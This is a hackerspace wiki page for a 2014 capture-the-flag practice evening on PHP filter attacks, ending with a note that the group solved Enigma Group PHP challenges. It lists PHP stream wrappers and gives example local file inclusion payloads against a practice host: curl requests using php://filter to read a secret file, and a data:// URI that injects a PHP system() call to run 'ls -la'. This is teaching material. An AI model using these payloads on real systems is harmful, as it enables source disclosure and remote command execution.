CTF-practice-evening:2014-06-23

From Technologia Incognita
Jump to: navigation, search
CTF-practice-evening:2014-06-23
Date 2014/06/23
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands:
    • php://input
    • output
    • df
    • memory
    • temp
    • filter
  • Example of LFI attacks:
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
    • http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
    • ( expect:// )
    • arrays: /index.php?page[]=A&page[]=B

Enigma group PHP challenges

  • We solved challenges 1-11 together on the beamer!  :-)